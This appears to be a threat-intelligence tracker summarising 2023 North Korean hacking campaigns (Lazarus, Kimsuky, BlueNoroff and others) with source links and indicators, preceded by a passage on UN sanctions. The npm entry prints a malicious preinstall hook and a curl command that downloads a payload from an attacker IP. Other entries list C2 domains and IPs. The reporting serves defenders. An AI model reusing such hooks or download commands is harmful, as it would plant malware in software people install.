The second generation sanctions, however, cannot avoid impacting the non-elite civilian population as they have “indiscriminately targeted entire sectors of the North Korean economy, regardless of whether there was a proven direct link to the nuclear programme”, the report notes. It describes how the “UNSC particularly targeted the top North Korean export industries, progressively cutting off every profitable source of external revenue for the country and its people. Resolution 2321 (November 2016) targeted the mineral trade, one of the country’s most important sources of revenue [and one of its largest employers]. Resolution 2371 (August 2017) completely banned any export of minerals, as well as of seafood. Resolution 2375 (September 2017) banned exports of textiles, an industry in which the overwhelming majority of workers are women. Finally, Resolution 2397 (December 2017) targeted the remaining North Korean exports, including agricultural products, machinery, and electrical equipment.”
“There are serious questions about the efficacy of the current United Nations sanctions regime”, a leaked report from the UN panel of experts has concluded. UN sanctions imposed on the DPRK over the past decade have failed to prevent Pyongyang from scaling up its nuclear and ballistic missile programmes.
Andray Abrahamian in his March 2016 38 North article describes how North Koreans have learnt to navigate the many restrictions imposed on them during the last ten years. For example, they regularly skirt around financial restrictions by using informal money transfers to banks in China; that is, cash from Pyongyang crosses the border via intermediaries and turns up in a Chinese bank account with no formal record of origin. He points out that the more aggressive financial sanctions imposed by UNSCR 2270 and subsequent UNSC resolutions will only succeed against these sorts of evasive tactics developed by the DPRK if its neighbours—as well as traders, bankers and regimes around the world—are willing to cooperate. Indicators::

Scarcruft Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures

Date:: 2023-07-28 URL:: https://securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/ Tags:: Details::

ScarCruft lured victims using U.S. military-related documents to run malware staged from legitimate compromised Republic of Korea websites
The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware Indicators::

Spreading malware disguised as coin and investment-related content

Date:: 2023-07-31 URL:: https://asec.ahnlab.com/ko/55646/ Tags:: Kimsuky Details:: Indicators::

VMConnect Malicious PyPI packages imitate popular open source modules

Date:: 2023-08-03 URL:: https://reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules Tags:: Details::

New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
When we decode the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine
The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host’s platform name, username and a random, 6 character-long string. Indicators::
45.61.139.219
ethertestnet.pro
deliworkshopexpress[.]xyz

The CoinsPaid Hack Explained: We Know Exactly How Attackers Stole and Laundered $37M USD

Date:: 2023-08-07 URL:: https://coinspaid.com/company-updates/the-coinspaid-hack-explained/ Tags:: TraderTraitor, Money Laundering Details::

Based on our internal investigation, we have reasons to suspect that the top-tier hacker group Lazarus may be behind the attack on CoinsPaid. The hackers employed the same tactics and money laundering schemes that Lazarus had used in the recent Atomic Wallet heist.
One of our employees responded to a job offer from Crypto.com.
While participating in the interview, they received a test assignment that required the installation of an application with malicious code.
After opening the test task, profiles and keys were stolen from the computer to establish a connection with the company’s infrastructure.
Having gained access to the CoinsPaid infrastructure, the attackers took advantage of a vulnerability in the cluster and opened a backdoor.
The knowledge perpetrators gained at the exploration stage enabled them to reproduce legitimate requests for interaction interfaces with the blockchain and withdraw the company’s funds from our operational storage vault. Indicators::

FBI Identifies Cryptocurrency Funds Stolen by DPRK

Date:: 2023-08-22 URL:: https://fbi.gov/news/press-releases/fbi-identifies-cryptocurrency-funds-stolen-by-dprk Tags:: Money Laundering Details:: Indicators::

3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG
39idqitN9tYNmq3wYanwg3MitFB5TZCjWu
3AAUBbKJorvNhEUFhKnep9YTwmZECxE4Nk
3PjNaSeP8GzLjGeu51JR19Q2Lu8W2Te9oc
3NbdrezMzAVVfXv5MTQJn4hWqKhYCTCJoB
34VXKa5upLWVYMXmgid6bFM4BaQXHxSUoL

Mandiant: APT38 Un-usual Suspects

Date:: 2023-08-23 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean-regime-backed-threat-group Tags:: APT38 Details::

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:
We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts. Indicators::

VMConnect supply chain attack continues, evidence points to North Korea

Date:: 2023-08-23 URL:: https://reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues Tags:: JokerSpy Details::

In early August, ReversingLabs identified a malicious supply chain campaign that the research team dubbed “VMConnect.” That campaign consisted of two dozen malicious Python packages posted to the Python Package Index (PyPI) open-source repository. The packages mimicked popular open-source Python tools, including vConnector, a wrapper module for pyVmomi VMware vSphere bindings; eth-tester, a collection of tools for testing Ethereum-based applications; and databases, a tool that gives asynchronous support for a range of databases.
The research team has continued monitoring PyPI and now has identified three more malicious Python packages that are believed to be a continuation of the VMConnect campaign: tablediter, request-plus, and requestspro. As happened with the ReversingLabs team's earlier VMConnect research, the team was unable to obtain copies of the Stage 2 malware used in this campaign. However, an analysis of the malicious packages used and their decrypted payloads reveals links to previous campaigns attributed to Labyrinth Chollima, an offshoot of Lazarus Group, a North Korean state-sponsored threat group. Indicators::

US arrests Tornado Cash co-founder, sanctions another who remains at large

Date:: 2023-08-23 URL:: https://therecord.media/us-arrests-tornado-cash-cofounder https://justice.gov/usao-sdny/pr/tornado-cash-founders-charged-money-laundering-and-sanctions-violations https://home.treasury.gov/news/press-releases/jy1702 Tags:: Money Laundering Details:: Indicators::

Lazarus Group's infrastructure reuse leads to discovery of new malware

Date:: 2023-08-24 URL:: https://blog.talosintelligence.com/lazarus-collectionrat/ https://blog.talosintelligence.com/lazarus-quiterat/ Tags:: Details::

Another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.
Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity. Indicators::

Active North Korean campaign targeting security researchers

Date:: 2023-09-07 URL:: https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/ Tags:: Details::

In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development.
Over the past two and a half years, the campaign has continued.
Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0day being used to target security researchers in the past several weeks.
DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets.
After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire.
Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package.
Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain.
The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits. Indicators::

Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry

Date:: 2023-09-18 URL:: https://paper.seebug.org/3033/ Tags:: CVE Details::

This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry
It is speculated that Konni may be exploring new attack vectors.
The captured sample named wallet_Screenshot_2023_09_06_Qbao_Network.zip, and it references Qbao Network, which is described as follows: Indicators::

Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

Date:: 2023-09-29 URL:: https://welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ Tags:: Details::

Lazarus delivered various payloads to the victims’ systems; the most notable is a publicly undocumented and sophisticated remote access trojan (RAT) that we named LightlessCan, which represents a significant advancement compared to its predecessor, BlindingCan. LightlessCan mimics the functionalities of a wide range of native Windows commands, enabling discreet execution within the RAT itself instead of noisy console executions. This strategic shift enhances stealthiness, making detecting and analyzing the attacker’s activities more challenging. Indicators::

Assessed Cyber Structure and Alignments of North Korea in 2023

Date:: 2023-10-10 URL:: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023 Tags:: Details::

The DPRK’s offensive program continues to evolve, showing that the regime is determined to continue using cyber intrusions to conduct both espionage and financial crime to project power and to finance both their cyber and kinetic capabilities.
Latest DPRK nexus operations hint at an increase in adaptability and complexity, including a cascading software supply chain attack seen for the first time, and consistently targeting blockchain and fintech verticals.
While different threat groups share tooling and code, North Korean threat activity continues to adapt and change to build tailored malware for different platforms, including Linux and macOS.
Mandiant’s continuous monitoring of DPRK aligned malicious cyber actors highlights a significant multiyear shift and blend in the country’s cyber posture.
Overlaps in targeting and shared tooling muddles attribution attempts for investigators while streamlining adversarial activities.
Historical examples of activity and uncategorized clustering represent a way forward for maintaining visibility on separate groups. Indicators::

Lazarus Group’s Undercover Operations 2022–2023 L. Taewoo, S. Lee & D. Kim

Date:: 2023-10-13 URL:: https://youtube.com/watch?v=B5hYzdCSQ2E Tags:: Details::

Lazarus Group’s cyberattacks targeting South Korea between 2022 and 2023. It focuses on their large-scale infection campaigns exploiting vulnerabilities in financial security software and watering hole techniques.
Target Sectors: Lazarus Group targeted South Korean financial institutions, media companies, software developers, and cryptocurrency exchanges.
Attack Techniques: The group leveraged zero-day vulnerabilities in widely used financial security software and watering hole attacks by compromising popular websites.
Infiltration: Lazarus hacked into high-traffic websites and set up watering hole pages -> Victims accessing these pages unknowingly downloaded malware due to vulnerabilities in financial security software.
Lateral Movement: After initial access, the group spread malware internally by exploiting SMB services, scanning networks, and leveraging additional vulnerabilities.
Exfiltration: Key servers were compromised to steal sensitive data -> used as hubs for further information leakage.
Case Study: Operation Gold Goblin
Lazarus exploited vulnerabilities in financial security software to launch targeted attacks.
The attackers analyzed stolen source code to develop exploit tools for future attacks.
The campaign affected ~10 million devices in South Korea, highlighting systemic risks in mandatory banking software.
Malware Analysis: Four types of malware were identified, including Rocket Downloader (used for initial access) and others designed for persistence, data exfiltration, and remote control.
Command & Control (C&C): Lazarus set up internal web-based C&C servers within compromised networks to maintain control over infected systems.
Techniques Used: DLL side-loading, Directory traversal vulnerabilities, Buffer overflow exploits, Privilege escalation via “PrintNightmare” vulnerabilities
The presentation links Gold Goblin to previous Lazarus operations like “Operation Bookcode” (2020) and “Dream Job” (2018).
Evidence suggests Lazarus reused stolen source code and evolved their techniques over time.
Challenges Highlighted: Delayed patching of financial security software by banks left users vulnerable, attackers exploited systemic reliance on outdated mandatory banking tools in South Korea, the interconnected nature of media companies amplified the spread of infections.
The Lazarus Group’s campaigns demonstrate advanced tactics, persistence, and adaptability. Their attacks on critical sectors in South Korea reveal systemic cybersecurity weaknesses. The presentation emphasizes the need for proactive threat intelligence, faster patch deployment, and improved cybersecurity practices to mitigate such threats. Indicators::

How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs

Date:: 2023-10-19 URL:: https://zetter-zeroday.com/p/how-north-korean-workers-tricked https://apnews.com/article/north-korea-weapons-program-it-workers-f3df7c120522b0581db5c0b9682ebc9b https://justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation Tags:: DPRK-IT Details:: Indicators::

TeamCity CVE-2023-42793 / CyberLink Supply Chain Attack

Date:: 2023-10-20 URL:: https://microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ https://bleepingcomputer.com/news/security/microsoft-lazarus-hackers-breach-cyberlink-in-supply-chain-attack/ https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/ Tags:: CVE Details::

Since early October 2023, Microsoft has observed two North Korean nation-state threat actors—Diamond Sleet and Onyx Sleet
exploiting CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server
TeamCity is a continuous integration/continuous deployment (CI/CD) application used by organizations for DevOps and other software development activities. Indicators::

Lazarus’ New Campaign Exploiting Legitimate Software

Date:: 2023-10-26 URL:: https://kaspersky.com/about/press-releases/2023_a-cascade-of-compromise-kaspersky-exposes-lazarus-new-campaign-exploiting-legitimate-software Tags:: Details::

The adversary exhibited a high level of sophistication, employing advanced evasion techniques and deploying a SIGNBT malware to control the victim. They also applied the already well-known LPEClient tool, previously seen targeting defense contractors, nuclear engineers and the cryptocurrency sector. This malware acts as the initial point of infection and plays a crucial role in profiling the victim and delivering the payload. Kaspersky researchers' observations indicate that LPEClient's role in this and other attacks aligns with the tactics employed by the Lazarus group, as also seen in the notorious 3CX supply chain attack. Indicators::

Deep Dive into the Lazarus Group's Foray into macOS

Date:: 2023-10-29 URL:: https://slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos Tags:: Details::

This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA.
We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database. Indicators::

FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application

Date:: 2023-10-30 URL:: https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c Tags:: Kimsuky Details::

Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them Indicators::

Lazarus Targets Bloackchain Engineers With New KandyKorn macOS Malware in attacks against blockchain engineers.

Date:: 2023-10-31 URL:: https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn Tags:: Kandykorn, Bluenoroff, TA444, JokerSpy, RustBucket Details::

We discovered this intrusion when analyzing attempts to reflectively load a binary into memory on a macOS endpoint. The intrusion was traced to a Python application posing as a cryptocurrency arbitrage bot delivered via a direct message on a public Discord server.
Stage 0 (Initial Compromise) - Watcher.py
Stage 1 (Dropper) - testSpeed.py and FinderTools
Stage 2 (Payload) - .sld and .log - SUGARLOADER
Stage 3 (Loader)- Discord (fake) - HLOADER
Stage 4 (Payload) - KANDYKORN
The initial breach was orchestrated via a camouflaged Python application designed and advertised as an arbitrage bot targeted at blockchain engineers. This application was distributed as a .zip file titled Cross-Platform Bridges.zip. Decompressing it reveals a Main.py script accompanied by a folder named order_book_recorder, housing 13 Python scripts.
After download, testSpeed.py launches FinderTools, providing a URL (tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC) as an argument which initiates an outbound network connection.
HLOADER was identified through the use of a macOS binary code-signing technique that has been previously linked to the DPRK’s Lazarus Group 3CX intrusion. In addition to other published research, Elastic Security Labs has also used the presence of this technique as an indicator of DPRK campaigns, as seen in our June 2023 research publication on JOKERSPY.
While LinkPC is a legitimate second-level domain and dynamic DNS service provider, it is well-documented that this specific service is used by threat actors for C2. In our published research into RUSTBUCKET, which is also attributed to the DPRK, we observed LinkPC being used for C2.
The user on Reddit reported that a recruiter contacted them to solve a Python coding challenge as part of a job offer. The code challenge was to analyze Python code purported to be for an internet speed test. This aligns with the REF7001 victim’s reporting on being offered a Python coding challenge and the script name testSpeed.py detailed earlier in this research.
The domain reported on Reddit was group.pro-tokyo[.]top//OcRLY4xsFlN/vMZrXIWONw/6OyCZl89HS/fP7savDX6c/bfC which follows the same structure as the REF7001 URL (tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC): Indicators::
23.254.226[.]90
tp-globa[.]xyz
tp-globa[.]xyz
192.119.64[.]43

Operation Covert Stalker

Date:: 2023-11-01 URL:: https://asec.ahnlab.com/ko/58231/ Tags:: Kimsuky Details::

North Korea sends hacking emails disguised as normal URLs or with malicious code attached to specific individuals or organizations engaged in politics, diplomacy, and security
Windows systems are hacked by exploiting RDP vulnerabilities (CVE-2019-0708) , and vulnerable sites are hacked by exploiting unknown vulnerabilities
To ensure connection persistence , create accounts for RDP access, and additionally install remote management programs such as RDP Wrapper, Quasar RAT, Ammy RAT, AnyDesk, and TeamViewer . – Performs various malicious activities
such as searching for hacking targets, sending hacking emails, scanning for RDP vulnerabilities (CVE-2019-0708), and testing malware .
Induces payment of recovery costs after infecting with BlackBit ransomware . – Builds, manages, and operates C2
through web shells (Green Dinosaur, WebadminPHP, unknown, etc.) . – Some malware contains North Korean expressions such as “연동”, “봉사기”, and “대면부”. Indicators::

King of Thieves Black Alicanto and the Ecosystem of North Korea Based Cyber Operations

Date:: 2023-11-01 URL:: https://sansorg.egnyte.com/dl/3P3HxFiNgL Tags:: BlueNoroff, DangerousPassword, TA444 Details::

Sapphire Sleet (COPERNICIUM), APT38, Bluenoroff, TA444, DangerousPassword, CryptoCore, CryptoMimic, Stardust Chollima
Social engineering mainly via email or social media (LinkedIn, Discord)
Lure themes: US regulatory action, Risks of stablecoins, Pitch Deck, Investment agreements, Presentations (Protected), Salary Adjustments
DangerousPassword was known for Password.txt.lnk
2023 is the year of SecurePDF (or PDFReader, PDFViewer) Indicators::
cryptowave.capital daiwa[.]ventures

Crypto-Themed npm Packages Found Delivering Stealthy Malware

Date:: 2023-11-04 URL:: https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/ Tags:: Details::

Now that they’re done executing the PowerShell script, it’s immediately deleted to clean up the trace of its existence.
The actor went through several iterations of development in the dev-config repo making modest changes until this early prototype was completed and published on 14 Sep 2023 under the name dot-environment v.1.1.0.
Most notably, the resource that the malware called out to was found at 91.206.178.125/files/npm.mov a Polish IP address. Indicators::
preinstall: node index.js && del index.js
curl -o sqlite.a -L https://103.179.142.171/npm/npm.mov > nul 2>&1
npm.mov
puma-com 5.0.3 2023-10-30 troll1234 jacktroll83@gmail.com
erc20-testenv 5.0.3 2023-10-31 terek1234 terekhovstanislav2@gmail.com
blockledger 5.0.3 2023-10-31 xxx145465 xxx145465@gmail.com
cryptotransact 5.0.3 2023-10-31 sandwich1901001 sandwich190100@outlook.com
chainflow 5.0.3 2023-11-02 troll1234 jacktroll83@gmail.com
In each package, the package.json file lists the following GitHub repository:
url: git+https://github.com/jhonnpmdev/config-envi.git
url: https://github.com/johnsoncolin99325/dev-config.git
url: git://github.com/motdotla/dotenv.git
91.206.178.125
103.179.142.171

BlueNoroff strikes again with new macOS malware

Date:: 2023-11-06 URL:: https://jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ Tags:: BlueNoroff Details:: Jamf Threat Labs has identified a new malware variant attributed to the BlueNoroff APT group. BlueNoroff’s campaigns are financially motivated, frequently targeting cryptocurrency exchanges, venture capital firms and banks. During our routine threat hunting, we discovered a Mach-O universal binary communicating with a domain that Jamf has previously classified as malicious. Indicators:: swissborg[.]blog

https://x.com/MsftSecIntel/status/1722316021841764414

Date:: 2023-11-08 URL:: https://x.com/MsftSecIntel/status/1722316021841764414 Tags:: Details::

Sapphire Sleet, which overlaps with threat actors tracked by other researchers as BlueNoroff, CageyChameleon, and CryptoCore, is a nation-state sponsored threat actor based in North Korea and has targeted organizations in the cryptocurrency sector. Indicators::

BlueNoroff hackers plan new crypto-theft attacks

Date:: 2023-11-10 URL:: https://bleepingcomputer.com/news/security/microsoft-bluenoroff-hackers-plan-new-crypto-theft-attacks/ https://x.com/MsftSecIntel/status/1722316019920728437 Tags:: BlueNoroff Details::

Microsoft warns that the BlueNoroff North Korean hacking group is setting up new attack infrastructure for upcoming social engineering campaigns on LinkedIn. Indicators::

Two South Koreans indicted for allegedly colluding with North Korean hackers

Date:: 2023-11-21 URL:: https://nknews.org/2023/11/two-south-koreans-indicted-for-allegedly-colluding-with-north-korean-hackers/ https://spo.go.kr/site/spo/ex/board/View.do?cbIdx=1403&bcIdx=1043403 Tags:: Details:: Indicators::

Reuters: North Koreans use fake names, scripts to land remote IT work for cash

Date:: 2023-11-21 URL:: https://reuters.com/technology/north-koreans-use-fake-names-scripts-land-remote-it-work-cash-2023-11-21/ Tags:: DPRK-IT Details:: Indicators::

Palo Alto Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors

Date:: 2023-11-21 URL:: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ Tags:: DPRK-IT, DPRK-CI Details::

Contagious Interview as CL-STA-0240
Wagemole as CL-STA-0241 Indicators::

Diamond Sleet supply chain compromise distributes a modified CyberLink installer

Date:: 2023-11-22 URL:: https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/) Tags:: Details::

Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet. Indicators::

Korean gov’t officials targeted by North’s ‘journalist’ crypto hackers

Date:: 2023-11-22 URL:: https://protos.com/korean-govt-officials-targeted-by-norths-journalist-crypto-hackers/ https://koreajoongangdaily.joins.com/news/2023-11-22/national/northKorea/Norths-hackers-pose-as-officials-journalists-to-steal-info-and-crypto/1919045 Tags:: Details:: Indicators::

Operation Dream Magic, MagicLine4NX Hackers use zero-day in supply-chain attack

Date:: 2023-11-24 URL:: https://asec.ahnlab.com/en/57736/ https://bleepingcomputer.com/news/security/uk-and-south-korea-hackers-use-zero-day-in-supply-chain-attack/ https://documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf Tags:: CVE Details:: Indicators::

Crypto Theft macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads

Date:: 2023-11-27 URL:: https://sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ https://x.com/KSeznec/status/1717542794942660771 Tags:: RustBucket, KandyKorn Details::

North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.
Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:
Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.
In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.
SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.
A number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months. Indicators::
docs-send.online/getBalance/usdt/ethereum
drive.google.com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
on-global.xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
tp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
swissborg.blog/zxcv/bnm
23.254.226.90
104.168.214.151
142.11.209.144
192.119.64.43

FIOD + US Seizes Sinbad Crypto Mixer

Date:: 2023-11-29 URL:: https://bleepingcomputer.com/news/security/us-seizes-sinbad-crypto-mixer-used-by-north-korean-lazarus-hackers/ Tags:: Details::

This service has been seized as part of a coordinated law-enforcement action between the Federal Bureau of Investigation, the Financial Intelligence and Investigation Service (FIOD), and the National Bureau of Investigation taken against the Sinbad.io cryptocurrency mixing service, reads the seizure message on Sinbad[.]io.
The Federal Bureau of Investigation has seized the service in accordance with a seizure warrant pursuant to 18 U.S.C. 981 and 982 as part of a coordinated international law-enforcement operation.
In addition to the clearweb site shown above, the Tor site for Sinbad is no longer operational. This indicates that the servers for the mixing service were seized by law enforcement as well. Indicators::

USG: Sanctions North Korea’s Kimsuky hacking group

Date:: 2023-11-30 URL:: https://bleepingcomputer.com/news/security/us-govt-sanctions-north-koreas-kimsuky-hacking-group/ Tags:: Kimsuky Details::

The Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the North Korean-backed Kimsuky hacking group for stealing intelligence in support of the country's strategic goals. Indicators::

Crypto Country: North Korea's Targeting of Cryptocurrency

Date:: 2023-11-30 URL:: https://go.recordedfuture.com/hubfs/reports/cta-2023-1130.pdf Tags:: Details::

Since 2017, North Korea has greatly expanded its targeting of the cryptocurrency industry, stealing over an estimated $3 billion worth of cryptocurrency.
Prior to this, the regime saw previous success in stealing from financial institutions by hijacking the Society for Worldwide Interbank Financial Telecommunications SWIFT network.
However, this activity brought heavy attention from international authorities, and financial institutions responded by investing in improving their cyber defenses.
During the cryptocurrency bubble of 2017, when the technology reached the mainstream, North Korean cyber operators shifted their targeting from traditional finance to this new digital financial technology by first targeting the South Korean cryptocurrency market before significantly expanding their reach globally.
North Korean threat actors were accused of stealing an estimated $1.7 billion worth of cryptocurrency in 2022 alone, a sum equivalent to approximately 5% of North Korea’s economy or 45% of its military budget.
This amount is also almost 10 times more than the value of North Korea's exports in 2021, which sat at $182 million, according to the Observatory of Economic Complexity OEC.
North Korean threat actors’ operations targeting the cryptocurrency industry and how they launder the stolen cryptocurrency often mirror traditional cybercriminal groups that use cryptocurrency mixers, cross-chain swaps, and fiat conversions.
However, state support allows North Korean threat actors to expand the scale and scope of their operations to a level not possible by traditional cybercriminal groups, with approximately 44% of stolen cryptocurrency in 2022 traced to North Korean threat actors.
Targeting is not limited to cryptocurrency exchanges, with individual users, venture capital firms, and alternative technologies and protocols all having been targeted by North Korean threat actors.
All of this activity puts anyone operating in the industry at risk of becoming a potential target of North Korean threat actors and allows the regime to continue operating and funding itself while under international sanctions.
Anyone operating in the cryptocurrency industry — individual users, exchange operators, and financiers with a portfolio of startups — should be aware of the potential to be targeted by North Korean threat actors.
Entities operating in the traditional finance space should also be on the lookout for North Korean threat group activities.
Once cryptocurrency is stolen and converted into fiat currency, North Korean threat actors funnel the funds between different accounts to obscure the source.
Oftentimes stolen identities, along with altered photos, are used to bypass anti-money-laundering and know-your-customer AML/KYC verification.
Anyone who is a victim of an intrusion linked to a North Korean threat group may have their personally identifiable information PII used to set up accounts to facilitate the laundering of stolen cryptocurrency.
As a result, companies operating beyond the cryptocurrency and traditional finance industries should also be on the lookout for North Korean threat group activity and for their data or infrastructure being used as a launch pad for further intrusions.
Since most intrusions by North Korean threat groups start with social engineering and a phishing campaign, organizations should train employees to monitor for this activity and implement strong multi-factor authentication such as FIDO2-compliant passwordless authentication. Indicators::

Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

Date:: 2023-12-03 URL:: https://slowmist.medium.com/analysis-of-north-korean-hackers-targeted-phishing-scams-on-telegram-872db3f7392b Tags:: SquidSquad Details::

Since 2022, our team at SlowMist, using the SlowMist BTI intelligence network, discovered that the North Korean hacker group Lazarus initiated a widespread phishing operation on Telegram, specifically targeting the cryptocurrency industry. More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams. Due to the considerable impact of these fraudulent activities, we at SlowMist have undertaken a detailed analysis. Indicators::

Alex Masmej Near Miss

Date:: 2023-12-03 URL:: https://x.com/AlexMasmej/status/1731446788136292833 Tags:: SquidSquad Details::

